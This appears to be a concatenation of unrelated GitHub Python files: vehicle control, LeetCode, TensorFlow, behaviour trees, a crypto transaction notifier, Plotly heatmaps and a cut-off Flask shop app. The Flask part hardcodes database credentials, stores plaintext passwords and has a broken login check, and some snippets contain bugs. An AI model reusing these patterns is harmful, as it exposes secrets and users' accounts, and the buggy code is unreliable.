车辆横向控制器\nFunction List:\nHistory:\n \n LiXianQiang 2021/05/11 0.0.1 Stanley车辆横向控制算法实现\n******************************************************************************/\n\"\"\"\nimport math\nimport numpy as np\n\n\nclass Stanley:\n \"\"\"Stanley车辆横向控制算法\n\n 属于前轮反馈控制算法\n\n 参考链接: https://blog.csdn.net/renyushuai900/article/details/98460758\n https://blog.csdn.net/caokaifa/article/details/91483376\n 
https://www.bilibili.com/video/BV1rE411J7Gz\n\n 参考论文: <>\n \"\"\"\n\n def __init__(self, k_gain, bodyLen, max_steerAngle):\n \"\"\"控制器初始化\n\n Args:\n k_gain: float类, 增益系数\n bodyLen: float类, 车身长度\n max_steerAngle: float类, 最大转向角, 弧度制\n \"\"\"\n self.k_gain = k_gain\n self.bodyLen = bodyLen\n self.max_steerAngle = max_steerAngle\n\n def CalculateFrontWheelPoseWith(self, rearWheelPose):\n \"\"\"通过后轮位置计算前轮位置\n\n Args:\n rearWheelPose: list类 后轮位姿 (包括:后轮中心位置以及车辆航行角)\n rearWheelPose[0]: float类 后轮中心的 x 轴\n rearWheelPose[1]: float类 后轮中心的 y 轴\n rearWheelPose[2]: float类 车辆航向角(即:车身与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n Returns:\n frontWheelPose: list类 前轮位姿 (包括:前轮中心位置以及车辆航行角)\n frontWheelPose[0]: float类 前轮中心的 x 轴\n frontWheelPose[1]: float类 前轮中心的 y 轴\n frontWheelPose[2]: float类 车辆航向角(即:车身与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n \"\"\"\n frontWheelPose = []\n frontWheelPose[0] = rearWheelPose[0] + self.bodyLen * np.cos(rearWheelPose[2])\n frontWheelPose[1] = rearWheelPose[1] + self.bodyLen * np.sin(rearWheelPose[2])\n frontWheelPose[2] = rearWheelPose[2]\n return frontWheelPose\n\n def controller(self, refPose, currPose, currVel, reverse=False):\n \"\"\"车辆横向控制器\n\n 关于算法的实现原理与介绍, 请查阅参考资料\n\n 需要强调一点:\n 根据参考论文的描述, 算法是基于运动学模型而设计, 因此没有考虑车辆惯性的影响:\n 轮胎的侧偏以及转向伺服执行器的时延, 因此仅适用低速场景下. 但论文中通过对干扰项\n 进行补偿的方式实现, 也给出了适用于动力学模型的Stanley车辆横向控制器\n\n Args:\n refPose: list类 参考点位姿 关于参考点的选择: 一般选择轨迹中距离前轮中心\n 最近的一点,该点也叫最近路径点\n refPos[0]: float类 参考点的 x 轴\n refPos[1]: float类 参考点的 y 轴\n refPos[2]: float类 参考点的切线角(即:切线与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n currPose: list类 当前位姿(即:前轮中心位置以及车辆航行角)\n currPose[0]: float类 前轮中心的 x 轴\n currPose[1]: float类 前轮中心的 y 轴\n currPose[2]: float类 车辆航向角(即:车身与惯性坐标系所成的夹角)\n 有效数值范围 [pi, -pi)\n currVel: float类 当前速度(即:前轮中心的速度)简化情况下,\n 可以将其视作车辆质心位置速度/后轮速度\n reverse: bool类 车辆的行驶方向, 默认缺省值 False\n True 为 倒车行驶\n Flase 为 正向行驶\n\n Returns:\n diffAngle: float类, 前轮转向角输出值\n \"\"\"\n\n def AngleDiff(endAngle, startAngle):\n \"\"\"计算两个角之间的最小转向夹角\n\n 从起始角 startAngle 指向终止角 endAngle,即:endAngle - startAngle,\n 旋转方向的正负方向判断: 逆时针方向为正, 顺时针方向为负\n\n Args:\n endAngle: 终止角, 有效数值范围 [pi,-pi)\n startAngle: 起始角, 有效数值范围 [pi,-pi)\n\n Returns:\n diffAngle: 输出的转向角 有效数值范围 [pi,-pi)\n \"\"\"\n deltaAngle = endAngle - startAngle\n abs_deltaAngle = math.fabs(deltaAngle)\n abs_compleAngle = 2 * math.pi - abs_deltaAngle\n\n # 当旋转夹角在数值上大于补角时, 选择沿着补角进行旋转\n if abs_compleAngle < abs_deltaAngle:\n # 当 deltaAngle < 0 表示起始角一开始是以顺时针方向旋转, 并旋转到终止角,\n # 若沿着补角一侧进行旋转, 起始角则是以逆时针方向旋转, 并旋转到终止角\n # 当 deltaAngle > 0 表示起始角一开始是以逆时针方向旋转, 并旋转到终止角,\n # 若沿着补角一侧进行旋转, 起始角则是以顺时针方向旋转, 并旋转到终止角\n # 那么, (带方向)旋转夹角大小 = 正负方向 * 数值大小(补角的绝对值)\n diffAngle = -1 * np.sign(deltaAngle) * abs_compleAngle\n else:\n diffAngle = deltaAngle\n return diffAngle\n\n currPose = np.array([currPose]).T\n refPose = np.array([refPose]).T\n # 构建垂直于车辆的法向量\n yaw = currPose[2]\n # 模长为1的法向量\n normVec = np.array([[1 * math.cos(yaw + math.pi / 2)], [1 * math.sin(yaw + math.pi / 2)]])\n # 通过将误差向量投影到法向量,可以得到带符号的横向误差,\n LateralError = normVec.T @ (refPose[:2] - currPose[:2])\n\n # 根据论文描述, 当速度很低的时候, arctan(k*e/vel) 中的 k*e/vel 会变得很大,\n # 这时候它对横向(跟踪)误差会变得特别敏感, 因此在分母中加入 k_soft 使得\n # 小车在速度很低时也能正常运作\n k_soft = 1\n\n # 航向误差:参考点的切线角与车辆航向角所成夹角\n headingError = AngleDiff(refPose[2], currPose[2])\n\n # TODO 这里的currVel应该是前轮速度,这里暂时使用后轮速度代替\n # 横向控制控制律\n delta = headingError + math.atan2(self.k_gain * LateralError, k_soft + currVel)\n\n # 车辆转向的物理约束\n if abs(delta) > self.max_steerAngle:\n diffAngle = np.sign(delta) * self.max_steerAngle\n else:\n diffAngle = delta\n\n return 
diffAngle","repo_name":"lixianqiang/robotics_algorithm","sub_path":"control/stanley/python/script/stanley.py","file_name":"stanley.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"28584025453","text":"\"\"\"\n给你两个单链表的头节点 headA 和 headB ,请你找出并返回两个单链表相交的起始节点。\n如果两个链表不存在相交节点,返回 null 。\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n \"\"\"\n 链表headA 和 headB 的长度分别是 m 和 n。\n 假设链表 headA 的不相交部分有 a个节点,链表 headB 的不相交部分有 b 个节点,两个链表相交的部分有 c 个节点,\n 则有 a + c = m,b + c = n。\n \"\"\"\n\n # 核心:两条链表,2个指针,不同出发点,同时走一遍 两条链表,若是有相交处,相遇2次,无相交处,相遇一次,即为None。\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n # 边界:存在 空链表。\n if not headA or not headB:\n return None\n p, q = headA, headB\n while p != q:\n p = p.next if p else headB\n q = q.next if q else headA\n return p\n # 相交,则必存在 从某处开始节点地址一直相同。\n # 当链表A走到最后,从B开始遍历,若在A存在相同节点,则满足条件。\n # 核心:相同问题,借助哈希。\n # def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n # # 边界:存在 空链表。\n # if not headA or not headB:\n # return None\n # hash_a_set = set()\n # p, q = headA, headB\n # while p:\n # hash_a_set.add(p)\n # p = p.next\n #\n # while q:\n # if q in hash_a_set:\n # return q\n # q = q.next\n # return None\n # 相交,则必存在 从某处开始节点地址一直相同。\n # 当链表A和链表B都走到最后,相交时必定地址相同,一直回溯到地址不同的时刻,其最后一次相同的时刻即相交处。\n # 核心:回溯——借助 栈。\n # def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n # # 边界:存在 空链表。\n # if not headA or not headB:\n # return None\n #\n # stack_A_list = []\n # stack_B_list = []\n # p, q = headA, headB\n # while p:\n # stack_A_list.append(p)\n # p = p.next\n # while q:\n # stack_B_list.append(q)\n # q = q.next\n # insert_node = None\n # while len(stack_A_list) > 0 and len(stack_B_list) > 0 and stack_A_list[-1] == stack_B_list[-1]:\n # insert_node = stack_A_list.pop()\n # stack_B_list.pop()\n #\n # return insert_node\n","repo_name":"zcPasser/leetcode_python","sub_path":"first_leetcode/py160_intersection-of-two-linked-lists.py","file_name":"py160_intersection-of-two-linked-lists.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2717682261","text":"# Linear Regression on Tensorflow\n\n# Imports\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclass TFLinearRegression():\n \n def __init__(self,X,Y): \n self.X=X\n self.Y=Y\n # Setting the placeholders which will be inputs\n self.x=tf.placeholder(\"float32\",(None,X.shape[1]))\n self.y=tf.placeholder(\"float32\",(None,1))\n\n # Setting up the Variables\n self.w=tf.Variable(tf.random_uniform([X.shape[1],1]))\n self.b=tf.Variable(tf.random_uniform([1]))\n\n # Output\n self.output=tf.add(tf.matmul(self.x,self.w),self.b)\n\n # Optimizer\n self.loss=tf.reduce_mean(tf.pow(self.output - self.y,2))\n self.optimizer=tf.train.GradientDescentOptimizer(0.1).minimize(self.loss)\n self.init=tf.global_variables_initializer()\n \n\n def train(self):\n # Train of Tensorflow\n # Run the session\n with tf.Session() as sess:\n sess.run(self.init)\n for runCounter in range(10000):\n _,l=sess.run([self.optimizer,self.loss],feed_dict={self.x:self.X,self.y:self.Y.reshape(self.X.shape[0],1)})\n if(runCounter % 100==0):\n print(\"The loss after {} is {}\".format(runCounter,l))\n 
weights,bias=sess.run([self.w,self.b],feed_dict={self.x:self.X,self.y:self.Y.reshape(self.X.shape[0],1)}) \n return({\"weights\":weights,\"bias\":bias})\n\n def compareWithSklearnLinearRegression(self):\n lrModel=LinearRegression()\n lrModel.fit(self.X,self.Y)\n return({\"weights\":lrModel.coef_,\"bias\":lrModel.intercept_})\n \n \nif __name__==\"__main__\":\n \n # Read/Prepare the data\n data=np.random.rand(100,5)\n \n lr=TFLinearRegression(data[:,0:4],data[:,4])\n results=lr.train()\n print(results)\n sklearn_results=lr.compareWithSklearnLinearRegression()\n print(sklearn_results)\n \n \n","repo_name":"anantguptadbl/python","sub_path":"tensorflow-examples/regression/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"10085180761","text":"\"\"\"Verifying the decomposition of LTL into BT.\"\"\"\n\nfrom utils import (\n goalspec2BT, recursive_until, LTLNode, post_tick_until, ConditionNode)\n# from pygoal.utils.bt import goalspec2BT, recursive_until\nfrom py_trees.trees import BehaviourTree\nimport py_trees\n\n\ndef decompose():\n # goalspec = 'P_[KE][1,none,==] U P_[KA][1,none,==]'\n # goalspec = 'P_[KE][1,none,==] U P_[KA][1,none,==] U P_[KB][1,none,==]'\n # goalspec = 'P_[KA][1,none,==] U P_[KB][1,none,==] U P_[KC][1,none,==] U P_[KD][1,none,==], U P_[KE][1,none,==]'\n goalspec = '(F(P_[KE][1,none,==]) U G(P_[KA][1,none,==]))'\n # goalspec = '(P_[KA][1,none,==] & P_[KB][1,none,==]) U (P_[KC][1,none,==] & P_[KD][1,none,==])'\n # goalspec = '((P_[KA][1,none,==] U P_[KB][1,none,==]) & (P_[KC][1,none,==] U P_[KD][1,none,==])) & (P_[KE][1,none,==] & P_[KF][1,none,==])'\n root = goalspec2BT(goalspec, planner=None)\n # for i in root.iterate():\n # print(i.id, i.name)\n behaviour_tree = BehaviourTree(root)\n # bt = UntilNode('U')\n py_trees.logging.level = py_trees.logging.Level.DEBUG\n output = py_trees.display.ascii_tree(behaviour_tree.root)\n print(output)\n recursive_until(root)\n output = py_trees.display.ascii_tree(behaviour_tree.root)\n print(output)\n\n\ndef test_decompose_tick():\n goalspec = 'P_[KE][1,none,==] U P_[KA][1,none,==]'\n root = goalspec2BT(goalspec, planner=None, node=LTLNode)\n # py_trees.logging.level = py_trees.logging.Level.DEBUG\n behaviour_tree = BehaviourTree(root)\n recursive_until(root)\n # output = py_trees.display.ascii_tree(behaviour_tree.root)\n # print(output)\n return behaviour_tree\n\n\ndef test_multiple_ticks():\n ticks = [\n [False, True],\n [False, False],\n [True, False],\n [True, True]\n ]\n for tick in ticks:\n behavior_tree = test_decompose_tick()\n ltlnode = [\n node for node in behavior_tree.root.iterate() if isinstance(\n node, LTLNode)]\n # Now we have a behavior tree. Lets define the tick\n # This order is important for testing only. 
In real\n # setting the status of the node is used\n ltlnode[0].value, ltlnode[1].value = tick[1], tick[0]\n behavior_tree.tick()\n print(behavior_tree.root.status, tick)\n\n ticks1 = [\n [True, False],\n [True, True]\n ]\n ticks2 = [\n [True, False],\n [False, True]\n ]\n ticks3 = [\n [True, False],\n [False, False]\n ]\n ticks4 = [\n [True, False],\n [True, False]\n ]\n ticks5 = [\n [True, False],\n [False, False],\n [True, False],\n [True, True],\n ]\n\n ticks = [ticks1, ticks2, ticks3, ticks4, ticks5]\n for tick in ticks:\n behavior_tree = test_decompose_tick()\n ltlnode = [\n node for node in behavior_tree.root.iterate() if isinstance(\n node, LTLNode)]\n # Now we have a behavior tree. Lets define the tick\n for i in range(len(tick)):\n ltlnode[0].value, ltlnode[1].value = tick[i][1], tick[i][0]\n # print(ltlnode[0].value, ltlnode[1].value)\n behavior_tree.tick()\n # print(i, behavior_tree.root.status, tick[i])\n post_tick_until(behavior_tree.root)\n print(behavior_tree.root.status, tick)\n\n\ndef test_pf():\n r = ConditionNode('root', None)\n r = BehaviourTree(r)\n r.tick()\n print(r.root.status)\n\n\ndef main():\n # decompose()\n # test_decompose_tick()\n # test_multiple_ticks()\n test_pf()\n\n\ndef older():\n # from examples.decompose.utils import DummyNode\n\n from flloat.parser.ltlf import LTLfParser\n\n # parse the formula\n parser = LTLfParser()\n # formula = \"r U (t U (b U p))\" # F(b) U F(p)\"\n # formula = \"p U (b U (t U r))\"\n formula = \"((F r U t) U F b) U F p\"\n parsed_formula = parser(formula)\n print(parsed_formula)\n # evaluate over finite traces\n t1 = [\n {\"r\": True, \"t\": False, \"b\": False, \"p\": False},\n {\"r\": True, \"t\": False, \"b\": False, \"p\": False},\n {\"r\": False, \"t\": True, \"b\": False, \"p\": False},\n {\"r\": False, \"t\": False, \"b\": True, \"p\": False},\n {\"r\": False, \"t\": False, \"b\": False, \"p\": True},\n ]\n # t1 = [\n # {\"r\": False, \"t\": True, \"b\": False, \"p\": False},\n # {\"r\": True, \"t\": False, \"b\": False, \"p\": False},\n # {\"r\": False, \"t\": False, \"b\": False, \"p\": False},\n # {\"r\": False, \"t\": False, \"b\": True, \"p\": False},\n # {\"r\": False, \"t\": False, \"b\": False, \"p\": True}\n # ]\n\n print('t1', parsed_formula.truth(t1, 0))\n\n # t2 = [\n # {\"a\": False, \"b\": False},\n # {\"a\": True, \"b\": True},\n # {\"a\": False, \"b\": True},\n # ]\n # assert not parsed_formula.truth(t2, 0)\n\n # # from LTLf formula to DFA\n dfa = parsed_formula.to_automaton()\n # print(dir(dfa))\n print(dfa.get_transitions(), dfa.size)\n # assert dfa.accepts(t1)\n # assert not dfa.accepts(t2)\n\n # # print the automaton\n graph = dfa.to_graphviz()\n graph.render(\"./1\") # requires Graphviz installed on your system.\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aadeshnpn/PyGoal","sub_path":"examples/decompose/decomp.py","file_name":"decomp.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6449460079","text":"import datetime\nimport time\n\nfrom pip import main\n\n\ndef getYesterday():\n now = datetime.date.today()\n return now + datetime.timedelta(-1)\n\nprint('yesterday:',getYesterday())\n\n\nticks = time.time()\nprint (\"当前时间戳为:\", ticks)\n\n\nlocaltime = time.localtime(time.time())\nprint (\"本地时间为 :\", localtime)\n\n# 格式化成2016-03-20 11:45:39形式\nprint (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n\n# 格式化成Sat Mar 28 22:24:24 2016形式\nprint (time.strftime(\"%a %b %d %H:%M:%S 
%Y\", time.localtime()))\n \n# 将格式字符串转换为时间戳\na = \"Sat Mar 28 22:24:24 2016\"\nprint (time.mktime(time.strptime(a,\"%a %b %d %H:%M:%S %Y\")))\n ","repo_name":"Aostle/python","sub_path":"exercise/日期.py","file_name":"日期.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42445275347","text":"import asyncio\nfrom contextlib import suppress\nfrom typing import List\n\nfrom aioredis import Redis\n\nfrom services.jobs.scanner.event_db import EventDatabase\nfrom services.lib.config import SubConfig\nfrom services.lib.date_utils import parse_timespan_to_seconds\nfrom services.lib.delegates import INotified, WithDelegates\nfrom services.lib.depcont import DepContainer\nfrom services.lib.money import Asset, DepthCurve, pretty_dollar\nfrom services.lib.utils import class_logger\nfrom services.models.tx import ThorTx, EventLargeTransaction\nfrom services.models.tx_type import TxType\nfrom services.notify.types.cap_notify import LiquidityCapNotifier\n\n\nclass GenericTxNotifier(INotified, WithDelegates):\n def __init__(self, deps: DepContainer, params: SubConfig, tx_types, curve: DepthCurve):\n super().__init__()\n self.deps = deps\n self.params = params\n self.tx_types = tx_types\n self.logger = class_logger(self)\n self.max_tx_per_single_message = deps.cfg.as_int('tx.max_tx_per_single_message', 5)\n\n self.curve = curve\n self.curve_mult = params.as_float('curve_mult', 1.0)\n\n self.max_age_sec = parse_timespan_to_seconds(deps.cfg.tx.max_age)\n self.min_usd_total = int(params.min_usd_total)\n self.no_repeat_protection = True\n\n DB_KEY_ANNOUNCED_TX_ID = 'tx:announced-hashes'\n\n async def mark_as_announced(self, tx_id, clear=False):\n if not tx_id:\n return\n\n r: Redis = self.deps.db.redis\n if clear:\n await r.srem(self.DB_KEY_ANNOUNCED_TX_ID, tx_id)\n else:\n await r.sadd(self.DB_KEY_ANNOUNCED_TX_ID, tx_id)\n\n async def is_announced(self, tx_id):\n if not tx_id:\n return True\n\n r: Redis = self.deps.db.redis\n return await r.sismember(self.DB_KEY_ANNOUNCED_TX_ID, tx_id)\n\n async def on_data(self, senders, txs: List[ThorTx]):\n with suppress(Exception):\n await self.handle_txs_unsafe(senders, txs)\n\n async def handle_txs_unsafe(self, senders, txs: List[ThorTx]):\n txs = [tx for tx in txs if tx.type in self.tx_types] # filter my TX types\n\n if self.no_repeat_protection:\n flags = await asyncio.gather(*[self.is_announced(tx.tx_hash) for tx in txs])\n tmp_txs = []\n for flag, tx in zip(flags, txs):\n if flag:\n self.logger.warning(f'Tx {tx.tx_hash} ({tx.type}) has been already announced. 
Ignore!')\n else:\n tmp_txs.append(tx)\n txs = tmp_txs\n\n if not txs:\n return\n\n usd_per_rune = self.deps.price_holder.usd_per_rune\n if not usd_per_rune:\n self.logger.error(f'Can not filter Txs, no USD/Rune price')\n return\n\n min_rune_volume = self.min_usd_total / usd_per_rune\n\n large_txs = [tx for tx in txs if self.is_tx_suitable(tx, min_rune_volume, usd_per_rune)]\n large_txs = large_txs[:self.max_tx_per_single_message] # limit for 1 notification\n\n if not large_txs:\n return\n\n self.logger.info(f\"Large Txs count is {len(large_txs)}.\")\n\n cap_info = await LiquidityCapNotifier.get_last_cap_from_db(self.deps.db)\n has_liquidity = any(tx.is_liquidity_type for tx in large_txs)\n\n for tx in large_txs:\n is_last = tx == large_txs[-1]\n pool_info = self.deps.price_holder.pool_info_map.get(tx.first_pool_l1)\n await self.pass_data_to_listeners(EventLargeTransaction(\n tx, usd_per_rune,\n pool_info,\n cap_info=(cap_info if has_liquidity and is_last else None),\n mimir=self.deps.mimir_const_holder\n ))\n\n if self.no_repeat_protection:\n await self.mark_as_announced(tx.tx_hash)\n\n def _get_min_usd_depth(self, tx: ThorTx, usd_per_rune):\n pools = tx.pools\n if not pools:\n # in case of refund maybe\n pools = [tx.first_input_tx.first_asset]\n\n pools = [Asset.to_L1_pool_name(p) for p in pools]\n\n pool_info_list = list(filter(bool, (self.deps.price_holder.pool_info_map.get(pool) for pool in pools)))\n if not pool_info_list:\n return 0.0\n min_pool_depth = min(p.usd_depth(usd_per_rune) for p in pool_info_list)\n return min_pool_depth\n\n def is_tx_suitable(self, tx: ThorTx, min_rune_volume, usd_per_rune, curve_mult=None):\n pool_usd_depth = self._get_min_usd_depth(tx, usd_per_rune)\n if pool_usd_depth == 0.0:\n if tx.type != TxType.REFUND:\n self.logger.warning(f'No pool depth for Tx: {tx}.')\n min_share_rune_volume = 0.0\n else:\n if self.curve:\n curve_mult = curve_mult or self.curve_mult\n min_pool_share = self.curve.evaluate(pool_usd_depth) * curve_mult\n min_share_rune_volume = pool_usd_depth / usd_per_rune * min_pool_share\n else:\n min_share_rune_volume = 0.0\n\n if tx.full_rune >= min_rune_volume and tx.full_rune >= min_share_rune_volume:\n return True\n\n def dbg_evaluate_curve_for_pools(self, max_pools=20):\n pools = sorted(self.deps.price_holder.pool_info_map.values(), key=lambda p: p.balance_rune, reverse=True)\n usd_per_rune = self.deps.price_holder.usd_per_rune\n\n summary = \" --- Threshold curve evaluation ---\\n\"\n for pool in pools[:max_pools]:\n if pool.asset.startswith('THOR'): # no virtuals\n continue\n depth_usd = pool.usd_depth(usd_per_rune)\n min_pool_share = self.curve.evaluate(depth_usd) * self.curve_mult\n min_share_usd_volume = depth_usd * min_pool_share\n summary += f\"Pool: {pool.asset[:20]:<20} => Min Tx volume is {pretty_dollar(min_share_usd_volume)}\\n\"\n self.logger.info(summary)\n\n\nclass LiquidityTxNotifier(GenericTxNotifier):\n def __init__(self, deps: DepContainer, params: SubConfig, curve: DepthCurve):\n super().__init__(deps, params, (TxType.WITHDRAW, TxType.ADD_LIQUIDITY), curve)\n self.ilp_paid_min_usd = params.as_float('also_trigger_when.ilp_paid_min_usd', 6000)\n\n self.savers_enabled = params.get('savers.enabled', True)\n self.savers_min_usd_total = params.as_float('savers.min_usd_total', 10_000.0)\n self.savers_curve_mult = params.as_float('savers.curve_mult', 0.4)\n\n def is_tx_suitable(self, tx: ThorTx, min_rune_volume, usd_per_rune, curve_mult=None):\n if tx.meta_withdraw and (tx.meta_withdraw.ilp_rune >= self.ilp_paid_min_usd / 
usd_per_rune):\n return True\n\n if tx.is_savings:\n min_rune_volume_savers = self.savers_min_usd_total / usd_per_rune\n if super().is_tx_suitable(tx, min_rune_volume_savers, usd_per_rune, self.savers_curve_mult):\n return True\n\n return super().is_tx_suitable(tx, min_rune_volume, usd_per_rune, curve_mult)\n\n\nclass SwapTxNotifier(GenericTxNotifier):\n def __init__(self, deps: DepContainer, params: SubConfig, curve: DepthCurve):\n super().__init__(deps, params, (TxType.SWAP,), curve)\n self.dex_min_usd = params.as_float('also_trigger_when.dex_aggregator_used.min_usd_total', 500)\n self.aff_fee_min_usd = params.as_float('also_trigger_when.affiliate_fee_usd_greater', 500)\n self.min_streaming_swap_usd = params.as_float('also_trigger_when.streaming_swap.volume_greater', 2500)\n self._txs_started = [] # Fill it every tick before is_tx_suitable is called.\n self._ev_db = EventDatabase(deps.db)\n\n async def _check_if_they_announced_as_started(self, txs: List[ThorTx]):\n if not txs:\n return\n\n tx_ids = [tx.tx_hash for tx in txs]\n\n flags = await asyncio.gather(\n *[self._ev_db.is_announced_as_started(tx_id) for tx_id in tx_ids]\n )\n self._txs_started = [tx_id for tx_id, flag in zip(tx_ids, flags) if flag]\n if self._txs_started:\n self.logger.info(f'These Txs were announced as started SS: {self._txs_started}')\n\n async def handle_txs_unsafe(self, senders, txs: List[ThorTx]):\n await self._check_if_they_announced_as_started(txs)\n\n return await super().handle_txs_unsafe(senders, txs)\n\n def is_tx_suitable(self, tx: ThorTx, min_rune_volume, usd_per_rune, curve_mult=None):\n # a) It is interesting if a steaming swap\n if tx.is_streaming:\n if tx.full_rune >= self.min_streaming_swap_usd / usd_per_rune:\n return True\n\n # b) It is interesting if paid much to affiliate fee collector\n affiliate_fee_rune = tx.meta_swap.affiliate_fee * tx.full_rune\n if affiliate_fee_rune >= self.aff_fee_min_usd / usd_per_rune:\n return True\n\n # c) It is interesting if the Dex aggregator used\n if tx.dex_aggregator_used and tx.full_rune >= self.dex_min_usd / usd_per_rune:\n return True\n\n # d) If we announce that the streaming swap has started, then we should announce that it's finished,\n # regardless of its volume.\n if tx.tx_hash in self._txs_started:\n return True\n\n # e) Regular rules are applied\n return super().is_tx_suitable(tx, min_rune_volume, usd_per_rune, curve_mult)\n","repo_name":"tirinox/thorchainmonitorbot","sub_path":"app/services/notify/types/tx_notify.py","file_name":"tx_notify.py","file_ext":"py","file_size_in_byte":9299,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"35900615800","text":"# Import libraries and modules\nimport plotly.offline as pyo\nimport plotly.graph_objs as go\nfrom plotly import tools\nimport pandas as pd\n\n# Read data\ndf_1 = pd.read_csv(\"2010SitkaAK.csv\")\ndf_2 = pd.read_csv(\"2010SantaBarbaraCA.csv\")\ndf_3 = pd.read_csv(\"2010YumaAZ.csv\")\n\n# Build traces\ntrace_1 = go.Heatmap(\n x = df_1[\"DAY\"],\n y = df_1[\"LST_TIME\"],\n z = df_1[\"T_HR_AVG\"].values.tolist(),\n colorscale = \"Jet\",\n zmin = 5,\n zmax = 40\n)\n\ntrace_2 = go.Heatmap(\n x = df_2[\"DAY\"],\n y = df_2[\"LST_TIME\"],\n z = df_2[\"T_HR_AVG\"].values.tolist(),\n colorscale = \"Jet\",\n zmin = 5,\n zmax = 40\n)\n\ntrace_3 = go.Heatmap(\n x = df_3[\"DAY\"],\n y = df_3[\"LST_TIME\"],\n z = df_3[\"T_HR_AVG\"].values.tolist(),\n colorscale = \"Jet\",\n zmin = 5,\n zmax = 40\n)\n\n# Build the figure\nfig = tools.make_subplots(\n rows 
= 1,\n    cols = 3,\n    subplot_titles = [\"Sitka, AK\", \"Santa Barbara, CA\", \"Yuma, AZ\"],\n    shared_yaxes = True\n)\n\nfig.append_trace(trace_1, 1, 1)\nfig.append_trace(trace_2, 1, 2)\nfig.append_trace(trace_3, 1, 3)\n\nfig[\"layout\"].update(\n    title = \"Temperatures\"\n)\n\n# Save the plot\npyo.plot(fig, filename = \"03_multiple_heatmaps.html\")\n","repo_name":"daczarne/udemy_dash_course","sub_path":"03_plotly_basics/08_heatmap/03_multiple_heatmaps.py","file_name":"03_multiple_heatmaps.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"1681636902","text":"from re import U\nfrom flask import Flask, request, render_template, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime\n\n\napp = Flask(__name__)\n\n# 'postgresql://<user>:<password>@<host>:<port>/<database name>\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:root@localhost:5432/tienda'\n#app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://oqeyqjxvtgabsw:b725feeade390b604b07cc18aa8aee5156bd63e64a25b9d2f14f4ae82f30fd13@ec2-54-161-189-150.compute-1.amazonaws.com:5432/dfacl5b6rvkdn5'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'some-secret-key'\n\ndb = SQLAlchemy(app)\n\n# Import the models\n\nfrom models import Product, User, Invoice, Administrator\n\n# Create the database schema\n\ndb.create_all()\ndb.session.commit()\n\n# Page routes\n\n@app.route(\"/\")\ndef get_home():\n    return \"Este es el home\"\n\n# Route to create a user\n\n@app.route(\"/register\")\ndef register():\n    return render_template(\"register.html\")\n\n@app.route(\"/create_user\", methods=[\"POST\"])\ndef create_user():\n    name = request.form[\"name\"]\n    email = request.form[\"email\"]\n    password = request.form[\"password\"] \n\n    user = User(email, password)\n    db.session.add(user)\n    db.session.commit() \n\n    return redirect(url_for(\"login\")) \n\n# User login route\n\n@app.route('/login')\ndef login():\n    return render_template(\"login.html\")\n\n\n@app.route('/check_user', methods=['POST'])\ndef check_user():\n    email = request.form[\"email\"]\n    password = request.form[\"password\"]\n    users = User.query.filter(User.password==password,User.email==email)\n\n    try:\n        if(users[0] is not None):\n            return render_template(\"register.html\")\n\n    except:\n        return redirect(url_for(\"product\")) \n\n\n    # Insert into the DB\n    # Look up the code in the DB\n    # If the code does not exist, create it in the DB\n    # If the code exists, redirect to the register page\n\n\n# Routes for other actions\n\n@app.route(\"/product\", methods=[\"GET\", \"POST\"])\ndef crud_product():\n    if request.method == \"GET\":\n\n        # Fetch a product\n        \n        print(\"Llegó un GET\")\n\n        # Insert a product\n\n        name = \"Jabon de cuerpo\"\n        brand = \"Palmolive\"\n        presentation = \"barra\"\n        category = \"Aseo\"\n        price = 2500\n        amount = 1\n        due_date = datetime.datetime(int(2001), int(9), int(24))\n        income_type = \"proveedor\"\n        supplier = \"Makro\"\n        location = \"Estante 1\"\n\n        entry = Product(name,brand,presentation,category,price,amount,due_date,income_type,supplier,location)\n        db.session.add(entry)\n        db.session.commit()\n        \n        return \"Esto fue un GET\"\n\n    elif request.method == \"POST\":\n\n        # Register a product\n\n        request_data = request.form\n        name = request_data[\"name\"]\n        brand = request_data[\"brand\"]\n        presentation = request_data[\"presentation\"]\n        category = request_data[\"category\"]\n        price = request_data[\"price\"]\n\n        print(\"Nombre:\" + name)\n        
